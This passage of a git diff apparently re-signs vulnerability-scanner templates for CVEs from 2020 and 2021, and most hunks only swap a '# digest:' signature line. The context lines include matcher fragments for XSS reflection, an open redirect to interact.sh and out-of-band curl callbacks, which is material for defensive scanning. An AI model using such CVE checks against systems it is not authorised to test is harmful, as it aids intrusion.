4a0a004730450221009feeceef542c46a8cfdd7536e65c7febb80c5c9894b5b3f479c7231e51eb7052022035045f855c47d58f4c2a3114b4f144d05ba0b35256c280a03c424591d29b44be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203953b96807b577b7f0ec89c51f1ea7d6dd45ffbb5e65d74157e4699f2b185cfb022100a272b0590f81337809b71e50724451e7214ad4c1ec109342aefea04c4e76c43b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index e1e5d6f28c..d33d12190a 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa784325a075212b3ce0376865f96c93c378ab99f4faeab9555776ec9f016c8f02200d54da34c1a8855ddf5491aee9b943191c45503351855984c257397f86a7b24f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ecd7675c422b5c9949a8ab6d201f35ee87e4502aad45359f825eb31c2f2fbd72022100aa92159e5d4b1010b07101e6b6f47d858170d3f8e97aa5db3c6c7a259bfe4b71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 632abbc14f..f0df655dae 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089b07a1f7f35dbfe8d692c1e503b6cc4ea0333448f26729c63bcd6c8860d3bbc022100ecfd9558b4925dcc29dc8e6cf9a52b94d26e455c4e3839af7357ebca2c68ce0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203dcb1fef19a7fa9b35fde4e8af7f5a556ec3bef81f6d6114cad76aa902b3e2ef022062c9894bb9bf27d61d18ac6794d4c55559edc8538f6edf2bca896a071eb40ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 58bcefc965..0360afa056 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e97d1bee3987941ccf2372d28ac983dac0ffa6d92d7cf641482f98a5e6bcfdb6022100f340b0edbabef04b09a3442c2045a18383ddb00569e52f9e03b1fbfee9d23d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064f746865056ed76e956f9d74d87a6521eb9fb40f81edad4935261d255f07e65022100e59247a07f93b55b06016bb399dffa3ea7a02c044dfae518b091a1e46339d43b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index c77d957110..1649bdf169 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -60,4 +60,4 @@ http: - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and -# digest: 4a0a00473045022002690dda68624c701141ce244fde09b3ae3756aabb82fc252b5ab8b9fede8d59022100f97d870328ce4b27454781d44526befd0aa74459a07e4121c04a578338d9da24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b166c170e0f5e124dfa59d0bf684f25282fd9fd1969e30f06e4a791b03945e29022100a6c6d3bb31891aecbc37d14c7edc9a799013c2041772b04eb43a9192e5bb97d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 937a6bb474..62befb18ea 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -57,4 +57,4 @@ http: - "# VERSION : ([0-9.]+)" internal: true part: body -# digest: 4a0a0047304502207ebd6b469ac0bd67dd7bc462fa62ef88bde2a9cb294df7a70aecebfd8f51f913022100be00ea371f5c1dbe5dd0833ee69f20b921c315d38f0cca3ba9d8e3af3b938674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebaa618ca3323275d8ec4b9ecd4b2efa87ccfc20b6c32f4345db7d9131287a050220430be84f77a0514738b84e2d1e71ef14950bc37a1076a9a8e3b8abaae18ecd46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index bfc480a7a1..e5a2160e57 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -68,4 +68,4 @@ http: regex: - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" part: header -# digest: 490a0046304402204b41fb153964f98c107c172d7a2c74f48970b835829d159402ad436a5e80db8b02203cc1966c1359d4d12a32c63ed49512b83bd1529496236446f0e2ddcaa41eb7d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200cc0dcb89b401e3b6076d25e168ca129176fcbaffc58685af1537dcb6b5a1288022100d9b4823cc1d19e9afa9bec4f25179a34c9f4ffcbc45674368cf670af46936359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 3875c074d1..27e6fd0889 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -58,4 +58,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100bab5ebb84f2b40789aa2f4c651095367ecf8b4665ec1f4b3f75e96c5765f6287022019534f0ff671a7ef2749ee47ad1a91ed034e31366ea8598dd270b53889840202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e81f669b103a63c658d1a86ead780d94d43b5d6ebf9f8c81e34035278897e3e8022021b83ecc964488a416f69dd934caeee92566d262ca5f009847ac680d14995597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index 69ef94b227..1230b9fc86 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f3db795bac6a39f0ab95221db22133a21ee123eaf7b2cbb5cc7a9ea0430fdaf022053244d01dda45456c1650e9b3d1268931b4378212caa405aef51a2348bb5b9c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f4930b8d840f547c0bfd6f9a798e97c350a55a0c94733af656705d18828a40a02201fb41251bafa5764b4b066f82642d0c426ed667b165382406d79fb95315b5e44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index f1d02baa52..3d3a3de9a7 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201102d935d5f0568de929e527b8a79643337300d43ea1d06c8d393897a26846c90220303502d7c3cf8938e0c68e3430c6a195e6fa05b24d1bc68a0d56806aa389cf5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096a7f8441fad6ef464b1b1062531a31f18b31793c22d91bf36d7c5d9c46fcad3022000f112053e665b73ef0d3bd5a51fee2177fb3199074560ebf449dceeaa60ce80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index 0d3dec9f23..3c87a720b5 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100b0f153fb5b5a5b46aa5888c17fb78097d6c6cdd3b1a8f811af53e076edda7c00022100dc0f8855a7fcb05d0996a28eaccea216b931ee6d9055ba490f128333a5909486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7c32df4a03cfb59d7328e145023b344dfc1d46b2e90a6b512b5c553ef58b71e022100b9cc42fb78abcb9f00c1ad3c06cfd5f7c8d0dc0f6ff601bf5c476fce200f8d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index ddd08cddf8..593570886f 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a257f68d7aac9aac5f21f8c40e66cf141b121a49c07feddaf15f26253ee3643022100df7f9ce16f459521c45985041cfb0db3a0f640ab0c98b7b4d5a895233c5f81dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9e4cbbbf460e2cdc9e694471064bc5eea2702ed1ba888d53fbe7d39c34d319802204c0abc5eaf59fd7e3d442c0eea055c44b417aa0d4c7977923195dd4e940ddd30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 65511769b2..46e4331d35 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6cc2c1a5f49519c2cb394d6fcc3729f838aa104d51b4f34c63f57f690b0d298022100b20b204f952796dd8d6786c616c72c0ad7ed8cd733afeced43c49c44445271e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7ef2cb495dbf326835dc4faaefaa52d8e50ce74b6b84eaf5ea7d7b21b34e961022066b7375c3e04cde7e47ec257014820f656e1a05434cc1b60671beb65b7695180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 2d0e473156..2c1a2afe9f 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -82,4 +82,4 @@ http: part: body words: - '"jsonrpc":' -# digest: 4b0a00483046022100d22ba62ffdf5abc541c17a02f6dc85ff7d87bcdcc8e0e9b164afcee24e7121c2022100e14e20422ed6f96ce5495276d43d614fa9e28284fbe7200504d8fe338797e868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dcd826a53f2d0e359b1cdaf8b06cacbb9e3b2103c9d2aa2da212b570e5b2339202210083a2d3610b5566d9dc998c8bdb3ab4677bc678f474a78192fa59b99aab23018f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 5ed53acfe4..0df05fd3dc 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -67,4 +67,4 @@ http: regex: - 'base64\,(.*?)" border=' internal: true -# digest: 490a0046304402204a050931d97fb4bd96f5b79ea9e272dd12ddd010881090fa1fbe7d66bf8dba7502207114368dda3e6e1d7423ee40b0eac74d3bee7aa8ac6000c9ae2eac06ca1acd32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc54b068eefb06a3bfa227662bd0e9646c252c177e19610e8fe8e71fb5a157f3022100c3756399379f5a4620c46b203e5a58d9350a6e82e6c8d2c5f70b37295dd7eab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 1bd968d834..2ec31b52c4 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e5269fa87351d0696eac2e95e1558c38cd483f64636dfa7e5bc81d5163b7b62202207e03da1ef5a15578b63bcf7eb06bdeb739b2be4c416e405414671458a866eedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f9b4c3ae25e9fe2f90e66155ae1a00ae3cba61df1a36f6f6feea4e95d5293ee022100b6bc309df6c2c97fa41d39b5cd90e220fb455392fdc91af1c47ae8a8d60c5aa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index e78ee9df03..0c9ef29a0f 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220334d3d1d497475f923737b75e9cb56b5d6eef6a7f382f67094e470a31dfd780e0220516f25b00740a8be2a78f7ed4c4900ecf0dc490c0ce18f7a6077f7c52af1c644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220481623f00682f100baf975520a1e6445a4c093d29c203b994aa1a43364a22d86022100ed400ff0863c9b1b07e1a8b873db2590f7d0013fc02f445bea8b2da1e25d2d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index c18c636861..dd35faf874 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -65,4 +65,4 @@ http: regex: - '' part: body -# digest: 4a0a00473045022038ef14fb949ecb26cf6e0bc275a460726d05e4f4ceb3d08e7f7b342100a684e9022100f038da88e0118652d8fadbf5aac6cc91b63489161e655adbe20e75b812e07b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a321be14f14f895f997662ab1f3eb21e49f54f02bb21c499a41c8273bb5ac2610220056a91edd9815b16d3c3471089318a7e0450abb55fd28cdef77f09ea10983476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index d95ec60a1c..4a7ab30af4 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f0a5616189deeabf3e79f051b432366c41cb9047616bab48038d28d6a4a3d4f022100be9594b79e5243c7cd077e3d67335eb3b3e962999dcc5452ca48888a6980a322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e7e01cc14a060ad40896cdbbb43c308b2ee4fd5a25756f3e3919c0a4897348202206805d2f1c31c886b77a4c6bcc7a223b139a34efba3c0f86f3e31d2395a37034b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 1c5cf64515..dc3164b175 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 400 -# digest: 4b0a00483046022100df8a1aaafef027c9a7ca24c450e8badd81d220552eb1a666e614ad749dc840a1022100b5a9b3f7999c6dcc0a7ecb7faca88b99f4d698e20e00de8db760c1b05f4db7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9ede27c00ac48f0a01d67e318b0489bb359c454c6d73c172a4e404f1cc236ee022100f0fbbf500a790a70b4e6bdb2baf4fc6387a6aba7284590a636efa848a5c57e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index d92e4a1152..761fe73d57 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201053fc6d9eceb86b62e93604a3bb4c29decb102730218d85e6ef2b34a648b3ee022100ae116fb72e469550e5d59d9c19d4f3769e73cd39e1be7a477680fe139e94be0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c9d2d169bc3235a6c300a6c09acd4cc45d629766c0cdadd28ee0d915b9ca01102201d344e6c15f8ff7f83444e9818fd60a0463a5f87fe7ef5172451aac3d8adef12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 310e5132d8..ce3b0231eb 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fcef1f5ce44b42760b65c7e2db5338fb632c4ccd0bfd4310e82dbe0d770bb5bf02206a043d2ea795f135c9491381f341986b98d0fa25a228fc71601bf71490468d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf46937c66b95e18a8bdfeae0bf85b7e53914f28b457c41bc9b5909361f1321d02207b24624212f17608a553a1f2f470f9e8c45eb42e58d45741894b4d1a6be8b4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 9f03d719b2..cd256d995f 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -61,4 +61,4 @@ http: - type: word words: - "We encountered an internal error" -# digest: 490a0046304402203e6e0482e52fd2746a9e615d4955f9dfcb23d28c2cd84c11097ae301c481f98a0220315895908f6f6d8106063b05eae0206e8a4b1d6d62b8580dad337f5e740d44c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5418fd149386037696872485af68a2a7abfcd145c34c7f8638c47cfab95a7d0022100e347294c26b8064ded3698ae80907bd62f1398a69a47dba465a31c54207487c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index 32863651fc..cb803c9b6c 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -75,4 +75,4 @@ http: - type: status status: - 403 -# digest: 4b0a00483046022100c5a7a38e72025ea7caccd5390dc5ccf22e5473725508efdf2b1db3e5074996830221008af3661d932d485a489222e268206934fde7cb4e4db9327c708e005ad6fcadc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203bfc7390e904463da3e9e24581c8502ef069540ea7730e15869bcb95630c8519022015b5d7c34b7610cf88d38904246e75218e539c437bb4f86f93301f51843ff291:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 7fd548be5d..677c4611fb 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c6446203bad1ef26dc458b3e075267a212ac9b442e2b33f2b6f98ae9d45ae2902204af8a0a9618ed7288407094e7c2a3d39a8a0d112c94511dac122099868f3dfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220407c3f5d2d9467fbde39aca1165e01df0db9da78b9a7d30a8b5894850972fa77022076e26f105ea3172b53180537cb1299cc5a089f3f94930b5faa8f226d54abb764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 4e2c211b24..56bb9be5db 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c4185e8f7ee6326b23eac3bb68f65bfb4a93391d156182a3e401fa906c9f3e6102201015bf2e1bfb158c19d5a9f9d65c391313584b46b8b20a4d14d5b79d2413bb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060554c26fad121c5f650a011ec744f75b30caab3f449c18f5e722218c585c41c022100ceaea3d5a22179cdeaf5d29fc4e9e636bc3c9f77f035d84597a7c9ae55fdd082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index c9fe1fe821..3c38a65e31 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204cc084a891afe65feaedc4d3bedf1a788cdda0c866607afffe419ee6c7a383be02201e523c62400ede7ae1a57e0e6def810eb9b32c0e745d04df46dffa1d099cdb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008bbe22e1103ca06b15fc6dbf9db81ee113ebd1f12a048fa4ee413e57c401c530221008524524279793f4bbb9edfb1c67317666b7a11b6331feeb84c989ffad44493b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index d0d64995f3..9c712ed1b3 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed5cb77663b1fa02a079d9ba371969da6ff88146c44decf1b1f53374283703ab022100c105fb80e89a73b650554efd5e75498fbd87feb1bc553f1b77e3985f208107a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0b6d69003ca5b5505cd8a66ec57f71a8115dcd56caf54bdb39ac3a9cc6cef3f022100b79c69e7a4c280e5bb0820f9872a8a7db6c0b917e7aca6fdf625f52df255648c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 2fb236dcda..6871fa5073 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -45,4 +45,4 @@ http: part: body words: - '{"result":{"isDisconnected":' -# digest: 490a0046304402202cc2f275dde198f9620df34fa4a311077891a497c9ced4b61ef4ea211e77ca0c022006133ed8f8077e067f578d94dc86a5d389c8b79134b6c1550dd2a130c7c6b93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f78a24bedfbd4d489dc1a1aa33abdf977bcb1f2b926cb41e1a3bd9fa4f023b6e022100a2078866397378d7314d388e1c523935ae85d07fd410245cc56b6b76afc02929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index de88f2140b..5b9ab486b3 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200640c5d5544ff6ef991bb415c29eb38caa4db8b69a6f71b9129970b31160c5d6022046e1514bce42721ffde6904f23c3bc950efb604d47d46454c3d9e77fcb54d9f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c43a79642e72d76bd2efe42d79edb11b6c2e0a78c5da0a9bc0339ac128eaed73022100800f9b175350a06a26ee591dc434e652b903b05601054916d5cfd00f99928a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index a46c7b7cb5..cdeaf2e59f 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -47,4 +47,4 @@ http: - "alert('document.domain')" - "No policy has been chosen." condition: and -# digest: 4a0a00473045022100f739400bf52f8dec1f217ed4d31b7f9f956aa0ca517d675ee5495ae2cd887b5c02207daaa0d190e01b48eef9b056c954a640ff59c3a9b91e4e624e6195e664a87e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220629006153c7a66dfeffb79e83cc3499f75a1fa21bb44be8f7cdc17e1c3fb6e5d022100b723f083bb930b163aa1fd144c5ea4ba7513b5fa4b09677f46a0e40503d4787f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 82d559627d..90f1924e48 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -143,4 +143,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 4a0a00473045022100abc381440f9275837d7e15eedee65a255ebe4897cdd81a9ec8bddc15e9fff97f02204d5198bbdca5253fecaf70b30ba2a9cb00162a44795ea0769c8d3c00f92c72fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201d0e5e3e6e18fad627d584edcdb83f3c87a8169a443c27d513516f1a8c7b2e4902201346887b59e99814010e99dcae1bda8df4d7b27687953815cba2a046d3f50bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 7d701316f2..ddfc699d0b 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -56,4 +56,4 @@ http: part: body words: - "does not have valid YAML syntax" -# digest: 4b0a004830460221009043529bbd2ee9d188c51b061bf113c007b7479375096d44f609b5c3e2fc23c5022100917d35c7dd970f582fedd2c0f51529e96d71d76fe07d448ce3ffb17b392fb980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100beb0cc714314ba14ce466fd0f6523c5f15dbc02dddfc151db7eafb4c16cdb913022012cb7681b369fbf099d6177e73af3d1e11ea5daa334a270a67e16b7f8c36b3bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index 58e3ddb280..a7ddb78947 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 401 -# digest: 4b0a00483046022100ed38ca4d38ee6a8827ce0cb424c58a1c6f7273942f72850e30a51a47a8ced4e80221009e6de8be7a1e2e0bca9cba77fac3f7d24b41648cf318f9678bc391420570f366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093d28c80696df84db2a386e67fb808de07873e3c881fcee275306eb5b3e8521902202a14e88ccaa567d183eebe6c93fc06f6dcf3aed238927a833eea0868588754f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 786823e519..0dc81703c5 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201dd62e40407144bfef7ec5c935ad7d0dbf6f7da3ab40ea8b5defb014c9292100022052c5c81fa72fdb0e69598dda215e657d24019497cffebb3dbad0988db0588af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092dfe2533a52f87c96d6308d504b960276cf7295c5f7ef1936eec72b5d63c60f022100b283e569e67182a0d0f45d5c48bb4d846940df584fb65a3418e2362705583429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index ecde7adfb4..84578e8516 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -55,4 +55,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a004730450220663af91463a6a4ca2abb22b5ef2800bcedf617cefdf7095c37774a8bec69c3de022100fc1cc469236ab053e23f1f424dd78b36b008320e5044ac7b29e9cc6b6d58a224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009abf1b4274dab17fea010056b07bff2900e664110ec53d6786006e7f1a05270c022100d0692a71fcb2f72d21ba13dd02aa9ed2added871166d3ffcee499794c99bd413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 08cd4cf267..bc0b65d724 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 